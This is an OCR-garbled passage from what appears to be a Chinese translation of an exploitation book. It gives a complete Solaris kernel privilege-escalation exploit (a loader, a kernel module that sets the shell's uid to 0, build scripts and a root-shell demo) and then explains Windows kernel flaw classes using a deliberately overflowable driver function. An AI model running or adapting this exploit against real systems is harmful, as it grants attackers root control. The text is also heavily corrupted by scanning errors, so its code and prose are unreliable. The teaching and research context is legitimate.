memset((char *) buf, 0x00, 4096); 
if(sysinfo(SI ISALIST, (char *) buf, 4095) « 0) ( 
perror("sysinfo"); : 
exit(0); 
} 


if(strstr(buf, "sparcv9")) 
sixtyfour = 1; 


memset ((char *) ver, 0x00, 32); 

if(svsinfo(SI RELEASE, (char *) ver, 32) < 0) ( 
perror("sysinfo"); 
exit(0); 

} 
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ptr = (char *) strstr(ver, "."); 

if(!ptr) { 
fprintf(stderr, "can't grab release version! \n"); 
exit(0); 

} 

ptrt+t; 


memset ((char *) buf, 0x00, 4096); 
if(sixtyfour) 

snprintf(buf, sizeof(buf)-1, "cp ./%s/o0064 /tmp/sparcv9/o0", ptr]; 
else 

snprintf (buf, sizeof(buf)-1, "cp ./%s/0032 /tmp/o0", ptr); 


if (sixtyfour) 
if(mkdir("/tmp/sparcv9", 0755) < 0) ( 
perror("mkdir"); 
exit(0); 


system(buf); 


SySfs(GETFSIND, modname); 
//perror("hoe!"); 


if(sixtyfour) 
system("/usr/bin/rm -rf /tmp/sparcv9"); 
else 
system("/usr/bin/rm -f /tmp/o0"); 


} 


26.2.2 ”加 载 内 核 模 块 


像 我 们 在 前 面 章节 中 提 到 的 , 下 面 的 代码 段 将 遍历 所 有 的 进程 , 查找 我 们 的 位 置 (基于 名 字 ， 
例如 oc000)， 用 0 (root uid) 更 新 凭证 结构 的 uia 字 段 。 

与 破解 代码 相 比 ， 接 下 来 的 代码 段 是 唯一 与 权限 提升 内 核 模块 有 关 的 部 分 。 为 了 使 代码 像 可 
加 载 内 核 模块 那样 工作 ， 其 余 的 代码 也 是 必需 的 。 


[1] mutex enter(&pidlock); 
[2] for (p = practive; p != NULL; p = p->p_next) { 


[3] if(strstr(p-»p user.u comm, (char *) "o000")) { 
[4] pp = p-»p parent; 

[5] newcr - crget(); 

[6] mutex enter(&pp-»p crlock); 


cr = pp-»p cred; 
crcopy toí(cr, newcr); 
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Ppp->p_cred = newcr; 


[7] newcr->cr_uid = 0; 
[8] mutex exit(&pp-»p crlock); 
} 
continue; 


} 


[9] mutex exit(&pidlock); 

RAIF HARTE [2 ] 处 的 进程 结构 的 链表 。 在 迭代 之 前 ， 需 要 为 这 个 链表 夺取 在 111 处 的 锁 。 
当 分 析 目 标 进程 的 时 候 〈 在 我 们 的 例子 里 是 破解 进程 ./o0o0 )， 这 样 做 并 没有 改变 什么 。 
practive 是 链表 的 头 部 指针 ， 因 此 ， 从 [2] 开始 ， 并 通过 p_next 指 针 移 到 下 一 区 段 。 在 [3] 上 ， 
把 进程 名 与 可 执行 的 破解 代码 做 比较 ， 被 整理 后 破解 代码 的 名 字 里 有 ooo0。 这 个 可 执行 模块 的 
名 字 保存 在 用 户 结构 的 u_comm 数 组 里 ， 进 程 结构 的 p_user 指 向 它 。strstr() 函数 实际 上 搜索 
的 是 第 一 个 在 u_comm 中 出 现 的 字符 串 ooo0。 如 果 在 进程 名 中 发 现 这 个 特殊 的 字符 串 ， 我 们 将 夺 
取 [4] 处 的 可 执行 破解 父 进程 的 进程 描述 符 ， 在 这 里 是 shell 解 释 程 序 。 从 这 一 点 开始 ， 代 码 将 为 
shell [5] 建 立新 凭证 结构 。 为 凭证 结构 操作 [6] 锁 住 mtex， 更 新 shell 老 的 凭证 结构 ， 在 [7 
处 把 用 户 ID 改 为 0〈 根 用 户 )。 特 权 提 升 代码 为 在 [8] 和 [9] 处 的 凭证 结构 和 进程 结构 链表 解锁 
mutex, 之 后 将 结束 。 


#include <sys/systm.h> 
#include <sys/ddi.h> 
#include <sys/sunddi.h> 
#include «sys/cred.h» 
#include <sys/types.h> 
#include «sys/proc.h» 
#include <sys/procfs.h> 
#include <sys/kmem.h> 
#include <sys/errno.h> 
#include «fcntl.h» 
#include <unistd.h> 


#include «sys/modctl.h» 
extern struct mod_ops mod_miscops; 


int g3mm3 (void); 


int g3mm3() 
{ 





register proc_t *p; 
register proc_t *pp; 
cred_t *cr, *newcr; 
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mutex_enter (&pidlock); 
for (p = practive; p != NULL; p = p->p_next) { 


if (strstr (p->p_user.u_comm, (char *) "o0c0")) ( 


pp = p-»p parent; 
newcr = orget(]; 


mutex enter(&pp-»p crlock); 
Cr - pp-»p cred; 

crcopy to(í(cr, newcr); 
pp-»p cred = newcr; 
newcr-»cr uid - 0; 

mutex exit(&pp-»p crlock); 


continue; 


mutex exit(&pidlock); 


return 1; 


Static struct modlmisc modlmisc - 
{ 

&mod miscops, 

"u comm" 
}; 


static struct modlinkage modlinkage = 


{ 
MODREV 1, 
(void *) &modlmisc, 
NULL 

}; 


int _init (void) 
t 


int i; 


if ((i = mod install(&modlinkage)) !- 0) 
//cmn err(CE NOTE, *")}; 
#ifdef _DEBUG 
else 
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cmn err(CE NOTE, "00000000 installed 000000000000"); 


#tendif 
i = g3mm3(); 
return i; 


int _info(struct modinfo *modinfop) 


( 


return (mod info(&modlinkage, modinfop)); 


int  fini(void) 


{ 


int i; 


if ((i = mod_remove(&modlinkage)) != 0) 
//cmn err(CE NOTE, "not removed"); 
#ifdef DEBUG 
else 
emn_err(CE_NOTE, "removed"); 
#endif 


return i; 


} 
如 果 你 没有 开发 内 核 代码 的 背景 ， 将 很 难 确定 正确 的 编译 选项 ， 因 此 ， 我 们 分 别 为 64 位 和 32 
位 Solaris 内 核 提供 了 不 同 的 shell 脚 本 ， 用 于 编译 这 个 内 核 模块 。 


===- make64.sh -----~------------------------- 
/opt/SUNWspro/bin/cc -xCC -g -xregs=no%appl,no%float -xarch=v9 \ 

-DUSE KERNEL UTILS -D KERNEL -D B64 moka.c 

ld -o moka -r moka.o 

rm moka.o 

mv moka o064 

gcc -o o000 sysfs ex.c 

/usr/ccs/bin/strip o000 o064 

T------------------2------22--- make32.sh ----------------------------2..-- 
/opt/SUNWspro/bin/cc -xCC -g -xregs=no%appl,no%float -xarch=v8 \ 

-DUSE KERNEL UTILS -D KERNEL -D B32 moka.c 

ld -o moka -r moka.o 

rm moka.o 

mv moka o032 

gcc -o o000 sysfs ex.c 

/usr/ccs/bin/strip o000 0032 


26.2.3 ”得 到 根 权 限 (uia=o) 
最 后 一 节 将 介绍 怎样 在 Solaris 上 得 到 根 权 限 〈uia=0)。 让 我 们 看 一 下 怎样 从 命令 行 运行 破 
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解 代 码 。 
$ uname -a 
SunOS slint 5.8 Generic 108528-09 sun4u sparc SUNW,Ultra-5 10 
$ isainfo -b 
64 
$ id 
uid-1001(ser) gid=10(staff) 
$ tar xf o0o0.tar 
$ ls -1 
total 180 
drwxr-xr-x 6 ser staff 512 Mar 19 2002 0000 
-rw-r--r-- 1 ser staff 90624 Aug 24 11:06 o0o0.tar 
$ cd o000 


$ 1s 
6 8 make.sh moka.c 0032-8 0064-7 0064-9 


sysfs_ex.c 

7 9 make32.sh 0032-7 0032-9 0064-8 0000 
$ id 

uid-1001(ser) gid-10(staff) 

$ ./0000 

$ id 

uid-1001(ser) gid=10(staff) euid=0 (root) 

$ touch toor 

$ ls -l toor 

-rw-r--r-- 1 root staff 0 Aug 24 11:18 toor 


$ 

这 个 破解 假设 [1] 将 在 32 位 或 64 位 的 Solaris 7、8 和 9 上 运行 。 因 为 时 间 的 关系 ， 我 们 没 在 老 
版 本 的 Solaris OS 〈 例 如 2.6 或 2.$.1) 上 测试 ， 因 此 ， 这 个 破解 不 支持 这 些 版 本 。 但 我 们 相信 ， 这 
个 破解 至 少 可 以 在 Solaris 2.5.1 和 2.6 上 编译 并 工作 。 


26.3 小结 


本 章 主 要 介绍 了 怎样 破解 第 25 章 中 发 现 并 讨论 的 内 核 漏 洞 。 为 各 种 破解 精心 制作 注入 
shellcode 的 载荷 是 很 困难 的 ， 在 OpenBSD 破 解 里 ， 我 们 就 费 了 很 大 的 动 。 注 意 ， 有 些 内 核 错误 很 
容易 被 破解 ， 而 有 些 则 需要 我 们 付出 更 多 努力 才能 破解 。 

为 了 可 以 开始 动手 编写 自己 的 破解 代码 , 或 者 使 内 核 代码 更 安全 , 我 们 重点 讨论 了 内 核 的 破 
解 方 法 。 我 们 相信 ， 审 计 内 核 代码 是 非常 有 趣 的 ， 为 自己 发 现 的 错误 写 破解 代码 就 更 有 趣 了 。 许 
多 项 目 提供 了 完整 的 内 核 源码 , 正 等 着 你 用 cvs 同 步 下 来 , 审计 它 呢 。 享受 发 现 漏洞 的 乐趣 吧 …… 








章 介绍 怎样 寻找 并 利用 Windows 内 核 模式 代码 里 的 bug。 我 们 先 会 大 致 介 绍 一 下 内 核 及 

常见 的 编程 缺陷 ， 随 后 将 介绍 两 个 常见 的 可 以 被 利用 的 内 核 接口 一 一 系统 调用 和 设备 
驱动 VO 控制 代码 。 最 后 将 介绍 可 以 提升 特权 的 、 执 行 二 次 用 户 模式 载荷 并 破坏 内 核 安全 的 内 核 
模式 利用 载荷 。 


27.1 Windows 内 核 模式 缺陷 一 一 逐渐 增多 的 猎物 


如 今 ， 关 于 影响 Windows 内 核 模 式 代 码 的 漏 润 的 消息 频繁 出 现 。 随 便 在 哪个 月 ， 在 Bugtrag 
或 Full Disclosure 上 总 会 看 到 有 人 报告 内 核 问题 ， 一 般 是 一 些 通过 设备 驱动 程序 里 的 缺陷 来 提升 
本 地 特权 的 ， 偶 尔 也 会 有 远程 可 利用 的 漏洞 ， 通 常 不 需要 认证 。 具 有 讽刺 意味 的 是 ， 这 些 问题 中 
的 大 多 数 都 出 自 安 全 产品 本 身 ， 例 如 个 人 防火 墙 。 

一 般 的 看 法 是 ， 人 们 很 少 去 注意 内 核 bug， 因 为 与 用 户 模式 的 pug 相 比 ， 它 给 人 的 感觉 是 更 难 
被 发 现 ， 也 更 难 利用 。 事 实 上 ， 影 响 用 户 模 式 应 用 程序 的 许多 bug〈 栈 溢出 、 整 数 溢出 、 堆 溢出 
等 ) 在 内 核 代码 中 同样 会 出 现 ， 在 用 户 模式 应 用 程序 里 寻找 bug 的 技术 〈 模 糊 测 试 、 静 态 分 析 、 
动态 分 析 等 ) 对 内 核 模 式 代 码 同 样 起 作用 。 在 某 些 情形 下 ， 内 核 模式 代码 里 的 bug 甚 至 比 用 户 模 
式 里 的 更 容易 被 发 现 。 

现 如 今 ， 内 核 缺 陷 受 到 的 重视 越 来 越 多 ， 这 是 为 什么 呢 ? 或 许 是 下 面 这 些 因素 促成 的 。 

Qa 对 内 核 低级 操作 了 解 更 多 了 。Windows 内 核 从 本 质 上 讲 是 一 个 复杂 的 黑 盒子 , 不 过 ,在 过 

去 的 十 多 年 里 ， 人 们 逐渐 了 解 了 它 。 目 前 有 许多 资源 可 以 帮助 我 们 理解 它 ，Mark E. 
Russinovich 和 David A. Solomon 所 著 的 Microsoft Windows Internals, Fourth Edition (Microsoft 
Press, 2004) 无 疑 是 一 个 非常 好 的 入 门 参考 书 。 此 外 ， 一 些 发 表 在 Phrack 上 的 关于 操纵 
内 核 的 文章 以 及 张贴 在 Rootkit.com 上 的 内 容 ， 把 内 核 里 一 些 隐 星 的 内 部 结构 清楚 地 展现 
在 了 直人 面前 。 

a 用 户 模式 应 用 程序 里 的 漏洞 变 得 越 来 越 少 ， 也 更 难 寻 找 了 。 在 安全 社团 里 ， 人 们 普遍 认 
为 简单 的 栈 溢 出 漏洞 正 慢 慢 枯竭 ， 至 少 在 重要 的 Windows 服 务 里 是 这 样 。 然 而 ， 运 行 在 内 
核 里 的 代码 却 很 少 有 人 仔细 检查 ， 部 分 原因 是 由 于 魔法 般 的 驱动 程序 开发 所 致 。 开 发 者 
通常 是 在 碰 到 需求 的 时 候 才 会 琢磨 来 自 设备 DDK (Driver Development Kit) 的 例子 ， 而 
且 大 多 数 的 软件 作坊 也 没有 足够 的 人 手 做 驱动 程序 的 同 级 评审 (peer review)。 基 于 以 上 
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原因 ， 内 核 模式 代码 成 了 潜在 的 “盛产 ”漏洞 的 地 方 。 

O 互相 连接 的 外 围 设备 导致 内 核 暴露 面 增加 。 目 前 ， 一 般 的 笔记 本 都 带 有 无 线 网 卡 、 蓝 牙 
适配器 、 红 外 等 接口 。 这 样 的 设备 由 内 核 模式 驱动 程序 所 控制 ， 它 们 负责 分 析 接 收 到 的 
原始 数据 ， 并 且 为 其 他 的 设备 驱动 程序 或 用 户 模式 的 应 用 程序 提取 数据 。 这 些 薄 弱 之 处 
很 可 能 会 成 为 处 于 同一 物理 位 置 的 攻击 者 的 目标 。 


27.2 Windows 内 核 介 绍 


在 保护 模式 下 运行 的 Windows 有 两 种 操作 模式 一 一 用 户 模式 和 内 核 模 式 ，CPU 通 过 特权 环 强 
制 运行 这 两 种 模式 : ring 3 为 用 户 模式 ，ring 0 为 内 核 模 式 。 因 为 内 核 模式 代码 运行 在 ring 0， 所 以 
它 可 以 访问 所 有 的 硬件 和 机 器 资源 。 内 核 的 职责 包括 内 存 管 理 、 线 程 调 度 、 硬 件 抽象 以 及 安全 强 
制 等 。 作 为 攻击 者 ， 我 们 的 目标 是 利用 内 核 模式 代码 里 的 漏洞 “获得 ring 0”， 更 确切 地 说 ， 就 是 
在 内 核 模式 里 执行 我 们 的 代码 ， 从 而 随意 访问 系统 资源 。 

Windows 内 核 一 般 位 于 ntoskrnl.exe 之 内 ， 尽 管 这 个 文件 名 可 能 会 根据 PAE (Physical 
Address Extension) 及 多 处 理 器 支持 等 情况 而 有 所 变化 。 内 核 由 引导 安装 程序 加 载 ， 在 Windows 
2003 及 以 前 的 版 本 上 是 nt1idr.exe， 在 Vista 上 改 成 了 winload.exe。ntoskrni 执 行 操作 系统 的 
Bob. 包括 虚拟 内 存 管理 、 对 象 管理 、 缓 存 管理 、 进 程 管理 和 安全 引用 监视 器 (Security Reference 
Monitor)。 其 他 的 功能 ， 诸 如 窗口 管理 器 (Window Manager) 和 对 画图 组 件 (graphics primitive) 
的 支持 等 通过 加 载 的 内 核 模 块 〈 称 为 设备 驱动 程序 ) 实现 。 

设备 驱动 程序 这 个 术语 属于 典型 的 用 词 不 当 。 尽 管 有 许多 设备 驱动 程序 直接 与 外 围 设 备 交 
T, 例如 网 卡 、 声 卡 、 显 卡 等 ， 但 一 些 驱 动 程序 和 物理 设备 并 没有 关系 ， 只 是 扩展 了 内 核 某 个 方 
面 的 功能 。Windows 带 有 很 多 设备 驱动 程序 ， 不 仅 有 必 备 的 只 支持 基本 功能 的 微软 驱动 程序 〈 例 
如 对 多 重文 件 系统 的 支持 )， 也 包括 控制 特殊 硬件 的 第 三 方 驱动 程序 。 








注解 注意 ! 当 我 们 谈论 内 核 模式 代码 里 的 bug 时 ， 不 一 定 是 指 微软 代码 中 的 bug。 尽 管 核心 内 
核 、 图 形 子 系统 和 微软 驱动 程序 中 存在 漏洞 ， 但 现在 报告 的 大 多 数 内 核 模 式 缺 陷 实际 上 
来 自 第 三 方 设备 驱动 程序 。 第 三 方 驱动 程序 代码 与 微软 的 代码 相 比 较 ， 质 量 通 常会 差 一 
些 。 同 样 ， 简 单 的 栈 溢 出 在 微软 的 产品 里 已 经 很 难看 到 了 ， 但 许多 第 三 方 的 用 户 模式 代 
码 里 仍 很 普遍 。 








27.3 ”常见 内 核 模式 编程 缺陷 


让 我 们 看 一 些 常见 的 内 核 bug 种 类 。 你 可 能 会 注意 到 ， 不 论 我 们 攻击 的 是 内 核 模式 代码 还 是 
用 户 模 式 人 代码， 这些 潜 在 的 缺陷 几乎 是 一 样 的 。 基 于 这 个 理由 , 我 们 将 不 再 详细 阐述 每 一 类 bug， 
因为 我 们 已 经 在 本 书 的 其 他 地 方 详细 讨论 过 了 。 本 章 只 介绍 与 内 核 模式 有 关 的 内 容 。 
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声名 狼藉 的 蓝屏 死机 : 

当 内 核 碰 到 危及 系统 操作 安全 的 情形 时 ， 系 统 就 会 死机 。 这 个 情形 被 称 为 bug 检 查 ， 也 就 
是 我 们 常 说 的 “终止 错误 ”或 “蓝屏 ” (Blue Screen Of Death, BSOD). 我 们 在 本 章 可 能 会 
交替 使 用 这 些 术 语 。 

当 系统 被 破坏 (break) 时 ， 如 果 附 上 了 内 核 调试 器 ， 就 可 以 用 调试 器 仔细 检查 谣 溃 的 情 
JU; 如 果 没 有 附 上 调试 器 ,系统 就 会 在 蓝 色 的 屏幕 上 显示 出 错 信息 ， 并 把 崩溃 的 信息 转 储 到 磁 
盘 上 . 

如 果 你 准备 模糊 测试 内 核 代码 或 开发 内 核 模式 载荷 ， 那么 ， 强 烈 建议 你 附 上 内 核 调试 器 ， 
以 便 出 现 未 经 处 理 的 异常 时 ， 可 以 进行 实时 调试 。 另 一 个 方法 是 检查 转 储 的 信息 ， 这 允许 离线 
分 析 。 





27.3.1 栈 溢出 

一 些 在 用 户 模式 里 利用 栈 溢出 的 基本 概念 同样 适用 于 内 核 模式 , 改写 返回 地 址 通常 就 足以 控 
制 执行 流 。 

本 地 用 户 利用 内 核 栈 溢出 的 过 程 通常 很 琐 细 。 可 以 直接 用 任意 地 址 (攻击 者 已 经 在 用 户 模式 
里 把 他 的 shellcode 映 射 到 那里 了 》〉 改 写 返 回 地 址 。 这 个 方法 有 两 个 好 处 ， 第 一 ，shellcode 的 大 小 
没有 限制 ， 因 为 不 必 把 它 保存 在 栈 缓冲 区 里 ; 第 二 , 没有 字符 限制 ，shellcode 可 以 包含 任何 字 节 ， 
包括 空 字 节 ， 因 为 不 需要 把 它 复制 到 本 地 栈 变量 缓冲 区 里 ， 因 此 也 就 不 会 受到 应 用 程序 限制 的 影 
响 。 

当 远程 触发 栈 溢出 时 ， 载 荷 必须 是 自 包含 的 。 一 些 无 线 设备 厂商 为 了 修复 远程 可 进入 的 、 在 
解析 畸形 802.1lb 帧 时 出 现 的 栈 溢出 ， 提 供 了 升级 的 驱动 程序 。 强 烈 推 荐 你 阅读 这 些 利用 栈 溢出 
的 文章 ， 它 们 发 表 在 Uninformed Journal 里 ， 见 http://www.uninformed.org/?v=6&a=2&t=sumry。 

/GS 标记 

Fi Windows Server 2003 SP1 DDK 发 布 时 起 ， 编 译 器 在 编译 设备 驱动 程序 时 默认 打开 /Gs 标 
Wo 这样 一 来 , 如 果 系 统 发 现 它 在 运行 时 出 现 栈 溢出 , 就 会 生成 bug 检 查 0xF7 (DRIVER_OVERRAN_ 
STACK_BUFFER)， 从 而 出 现 熟 悉 的 BSOD。 这 在 本 质 上 属于 拒绝 服务 ， 不 过 ， 如 果 它 可 以 被 远程 
触发 ， 且 不 需要 认证 ， 那 么 我 们 就 有 充分 的 理由 认为 它 是 十 分 严重 的 问题 。 

仔细 考虑 下 面 这 个 分 派 函数 。 我 们 在 27.5 节 中 会 仔细 介绍 驱动 程序 漏洞 ， 此 时 ， 只 要 注意 到 

Irp-»AssociatedIrp.SystemBuffer 

指向 用 户 的 缓冲 区 就 足够 了 ， 它 的 长 度 是 

irpStack-»Parameters.DeviceloControl.InputBufferLength 

这 个 函数 对 通过 这 个 缓冲 区 传递 的 结构 进行 处 理 。 它 包含 十 分 明显 的 溢出 ,此 外 还 有 内 存 泄 
露 的 问题 ， 因 为 它 几乎 没有 验证 输入 缓冲 区 的 长 度 。 


typedef struct _MYSTRUCT 
{ 





DWORD d1; 
DWORD d2; 
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DWORD d3; 
DWORD d4; 
} MYSTRUCT, *PMYSTRUCT; 


NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) 
{ 


PIO_STACK_LOCATION irpStack; 

DWORD dwlInputBufferLength; 
PVOID pvlIoBuffer; 

DWORD dwlIoControlCode; 
NTSTATUS ntStatus; 

MYSTRUCT myStruct; 


ntStatus = STATUS_SUCCESS; 
irpStack = IoGetCurrentIrpStackLocation(Irp); 


pvlIoBuffer = Irp->Associatedirp.SystemBuffer; 
dwInputBufferLength - irpStack- 

-Parameters.DeviceloControl.InputBufferLength; 
dwloControlCode - irpStack- 


»Parameters.DeviceloControl.ioControlCode; 


switch (irpStack-»MajorFunction) 


t 
case IRP MJ_CREATE: 


break; 

case IRP MJ_SHUTDOWN: 
break; 

case IRP_MJ_CLOSE: 
break; 


case IRP_MJ_DEVICE_CONTROL: 


switch (dwloControlCode) 


{ 
case IOCTL_GSTEST_DOWORK: 
if (dwInputBufferLength) 
t 
memcpy (&myStruct, pvlIoBuffer, 
dwliInputBufferLength); 


DoWork(&myStruct); 
memcpy (Irp- 
>AssociatediIrp.SystemBuffer, pvloBuffer, dwInputBufferLength); 
f Irp->IoStatus.Information = 


dwInputBufferLength; 
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else 


ntStatus = 
STATUS INVALID, PARAMETER; 


} 


break; 
default: 


ntStatus = STATUS_INVALID_PARAMETER; 
break; 


break; 


Irp->IoStatus.Status = ntStatus; 
IoCompleteRequest (Irp, IO NO INCREMENT); 
return ntStatus; 


) 
反 汇 编 这 个 函数 的 epilog 看 看 ， 这 个 驱动 程序 包含 的 函数 是 用 /Gs 编译 的 ， 因 此 ， 我 们 期 待 


看 到 验证 栈 cookie 的 过 程 : 
; Disassembly of call to IoCompleteRequest and epilog 
.text:00011091 xor di, dl 
.text:00011093 mov ecx, eax 
.text:00011095 call ds:IofCompleteRequest 
.text:0001109B xor eax, eax 
.text:0001109D pop ebp 
.text:0001109E retn 8 


这 个 函数 只 是 调用 了 TocompleteReauest 并 返回 。 通 过 尝试 并 测试 所 改写 的 保存 的 返回 地 
址 ， 从 这 个 函数 获取 执行 控制 是 件 很 普通 的 事情 。 编 译 器 判定 这 个 函数 不 会 产生 太 大 的 风险 ， 因 
此 就 没有 用 栈 cookie 保 护 它 。 只 要 在 这 个 函数 的 顶端 插入 下 列 虚 构 的 代码 行 , 重新 编译 并 反 汇 编 ， 
栈 保 护 就 被 启用 了 : 


CHAR chBuffer[64]; 
strepy(chBuffer, "This is a test"); 


DbgPrint(chBuffer); 


Disassembly of call to IoCompleteRequest and epilog 


i 


.text:000110BF xor al, dl 

.text:000110C1 mov ecx, ebx 
.text:000110C3 call ds:IofCompleteRequest 
.text:000110C9 mov ecx, [ebp-4] 


.text:000110cc pop edi 
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.text:000110CD pop esi 
.text:000110CE xor eax, eax 
.text:000110D0 pop ebx 
.text:000110D1 call sub 11199 
.text:000110D6 leave 
.text:000110D7 retn 8 


; Stack cookie validation routine 


.text:00011199 sub 11199 proc near ; CODE XREF: 
.text:00011199 cmp ecx, BugCheckParameter2 
.text:0001119F jnz short loc 111AA 
.text:000111A1 test ecx, OFFFFOOOOh 
.text:000111A7 jnz short loc_111AA 
.text:000111A9 retn 


/GS 这 个 选择 性 应 用 的 特性 对 内 核 模式 破解 程序 的 作者 来 说 是 个 好 消息 。 尽 管 /Gs 标记 有 时 
使 破解 变 得 更 困难 ， 但 对 设备 驱动 程序 来 说 ,传递 结 构 要 比 字符 数组 更 常见 ， 因此， 系统 仍 有 很 
多 薄弱 点 。 

比 起 只 判断 函数 是 否 包 含 字 符 数组 来 说 ， 编 译 器 用 于 确定 函数 是 否 应 当 设置 栈 cookie 的 算法 
要 稍微 复杂 一 些 。MSDN Chttp://msdn2.microsoft.com/en-US/library/8dbf701c.aspx) 上 对 此 做 了 详 
细 介 绍 。 

当然 ， 也 有 一 些 开 发 者 会 明确 禁用 /Gs 标 记 ， 或 是 编译 器 使 用 了 老 版 本 的 PDK。 


27.3.2 ” 堆 溢 出 

相 比 栈 溢出 来 说 ,内 核 堆 溢出 的 利用 几乎 没 和 人 研究 。 关于 这 个 主题 的 唯一 一 次 公开 讨论 是 在 
SoBelt 的 Xcon 2005A IR, YEhttp;//packetstormsecurity.nlXcon2005/Xcon2005 SoBelt.pdfn] DÀ 4X 
到 这 篇 文章 “How to exploit Windows Kernel memory pool”. 

已 经 有 人 在 内 核 里 发 现 了 堆 溢 出 漏洞 。 有 人 报告 Kaspersky Internet Security Suite 里 存在 这 样 
的 缺陷 : 

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=505 。 

SoBelt 的 方法 有 一 个 前 提 条 件 ， 为 了 在 系统 释放 被 溢出 的 池 时 获得 任意 写 原 语 权 限 ， 必 须 在 
被 溢出 的 块 (chunk) 之 后 建 一 个 空闲 的 内 存 ( 池 ) 块 。 任 意 改写 可 用 于 触发 KiDebugRoutine( 当 
一 个 未 经 处 理 的 异常 发 生 且 内 核 调 试 器 被 附 上 时 ， 将 调用 这 个 函数 )。 当 系统 释放 伪造 的 池 或 它 

邻居 时 ， 很 可 能 会 发 生 异常 ， 攻 击 者 因此 就 可 以 获得 执行 控制 权 。 不 过 ,载荷 首先 必须 修复 这 

ith, DERRER, AR RATS FE. 


27.3.3 ”没有 充分 验证 用 户 模式 地 址 


最 常见 的 内 核 编码 缺陷 是 没有 正确 验证 从 用 户 模式 传递 来 的 地 址 , 从 而 允许 攻击 者 改写 内 核 
空间 里 的 任意 地 址 。 倘 若 攻击 者 可 以 控制 目标 地 址 ,那么 他 对 被 改写 值 的 控制 力度 就 不 是 那么 重 
要 了 ， 因 为 对 这 种 类 型 的 bug 来 说 ， 有 太 多 的 方法 可 以 获得 执行 控制 了 。 
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利用 任意 改写 的 常见 手段 是 把 函数 指针 作为 目标 ， 并 且 改 写 它 ， 使 它 指向 用 户 模式 。 然 后 ， 
攻击 者 把 他 的 载荷 映射 成 这 个 用 户 模式 应 用 程序 里 的 地 址 ， 并 触发 (或 等 待 ) 调用 这 个 函数 指针 
的 操作 。 当 然 ， 把 内 核 模式 函数 指针 指向 用 户 模式 会 有 潜在 的 问题 ， 如 果 在 调用 它 时 ， 包 含 载荷 
的 用 户 模式 进程 不 是 当前 的 执行 上 下 文 , 可 能 是 没有 内 存 映 射 到 这 里 (或 者 如 果 有 ,但 不 是 载荷 )， 
最 终 将 导致 bug 检 查 。 

任意 改写 漏洞 在 设备 驱动 程序 中 很 常见 ,很 多 流行 的 反 病 毒 软 件 都 出 过 这 类 问题 , 其 中 不 乏 
Symantec. Trend Micro 等 一 线 厂商 的 产品 : http://www.idefense.com/intelligence/vulnerabilities/disp- 
lay.php?id=417, http://labs.idefense.com/intelligence/vulnerabilities/display.php?id-469. 

Microsoft Server Message Block Redirector 驱动 程序 也 容易 受到 此 类 攻击 : http://labs.ide- 
fense.com/intelligence /vulnerabilities/display.php?id=408. 

我 们 会 在 本 章 的 后 面 介 绍 怎样 检测 这 类 编码 缺陷 。 


27.3.4 多 目的 化 攻击 

开发 者 经 常 编写 驱动 程序 的 原因 是 , 他 们 需要 允许 用 户 模式 应 用 程序 访问 机 器 的 硬件 和 受 限 
资源 。 大 量 粗 制 滥 造 的 驱动 程序 没有 考虑 低 权 限 用 户 可 能 会 以 意料 之 外 的 方式 与 驱动 程序 交互 。 
在 允许 通过 驱动 程序 对 VO 空间 进行 访问 的 情形 中 ， 经 常会 见 到 这 样 的 例子 。 用 户 模 式 应 用 程序 
通常 运行 在 0 级 IOPL (IO Privilege Level) 下 。 这 意味 着 访问 1/0 空 间 会 受到 LO 端口 特权 映射 的 限 
制 ， 进 程 保 存在 内 核 里 的 位 图 指定 了 进程 能 访问 哪个 端口 。 对 那些 启用 SeTcbpPrivilege 的 进程 
特权 。 

这 类 问题 的 常见 解决 办 法 是 创建 TO 空间 可 访问 的 驱动 程序 。 但 是 ， 如 果 低 权限 的 用 户 可 以 
打开 这 个 设备 ， 并 通过 这 个 驱动 程序 随意 发 布 IT 和 OUT 指 令 ， 那 么 这 个 解决 办 法 本 身 就 是 漏洞 。 


27.3.5 ”共享 的 对 象 攻击 

驱动 程序 通常 需要 以 某 种 方式 与 用 户 模式 应 用 程序 进行 交互 , 除非 他 们 是 工作 在 其 他 驱动 程 
序 产 生 的 IRP (VI Request Packet) 上 的 过 滤 驱 动 程序 。 在 访问 与 用 户 模 式 共 享 的 资源 时 ， 内 核 模式 
的 开发 者 必须 非常 小 心 ， 同 样 ， 当 与 低 权限 进程 共享 资源 时 ， 高 特权 的 用 户 模式 服务 也 必须 谨慎 。 

在 MoKB (Month of Kernel Bug) 期 间 ， 有 人 报告 了 影响 Windows XP 及 以 前 版 本 的 图 形 子 系 
统 的 问题 。 在 包含 GUI 的 用 户 模 式 进程 里 ， 区 段 被 映射 成 只 读 的 ， 这 个 区 段 可 以 只 被 重新 映射 成 
读 - 写 和 数据 重 写 。 区 有 段 的 内 容 在 使 用 前 并 没有 经 过 内 核验 证 , 最 终 导 致 任意 代码 出 现在 内 核 的 上 
下 文 里 。 关 于 这 个 问题 的 详细 描述 参见 http://projects.info-pull.com/mokb/MOKB-06-11-2006.html。 

至 此 , 我 们 已 经 见识 了 内 核 代码 里 存在 的 一 些 漏洞 ,下 一 节 将 研究 用 户 模式 与 内 核 模 式 间 最 
重要 的 两 个 接口 一 一 Windows 系 统 调用 机 制 和 设备 驱动 程序 VO 控制 代码 。 


27.4 Windows 系统 调用 
从 十 到 今 ， 历 史 总 是 惊人 的 相似 ， 安 全 也 不 例外 。 翻 阅 早 期 出 现 的 Windows 内 核 中 的 漏洞 ， 
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再 把 它们 和 最 近 报 告 的 问题 相 比较 ， 不 难得 出 这 个 结论 。 第 一 个 内 核 bug 应 该 是 Mark Russinovich 
和 Bryce Cogswell 发 现 的 关于 系统 调用 验证 (validation) 的 问题 。 为 了 解释 系统 调用 是 怎样 工作 
的 ， 理 解 下 面 这 些 内 容 是 很 有 必要 的 。 
27.4.1 理解 系统 调用 

为 了 安全 地 允许 特权 操作 ， 例 如 打开 文件 、 操 纵 进 程 ， 系 统 必 须 通 过 系统 调用 从 用 户 模式 切 
换 到 内 核 模式 。 大 多 数 应 用 程序 开发 者 编写 的 代码 会 调用 Win32 API 里 的 库 函 数 ， 它 们 的 核心 由 
kerne132.G11、user.dl1 和 gaqi32.dl11 实 现 。 如 果 Win32 API 函 数 需 要 生成 一 个 系统 调用 ， 它 将 
Wi Hi Native API 里 相对 应 的 Nt* PHL: Creatrile iil H NtCreatFile: CreateThead iÑ Hj 
NtCreateThead, 4. Native API 没 有 正式 的 文档 ， 它们 用 于 在 用 户 模式 里 执行 CPU 指令 ， 从 
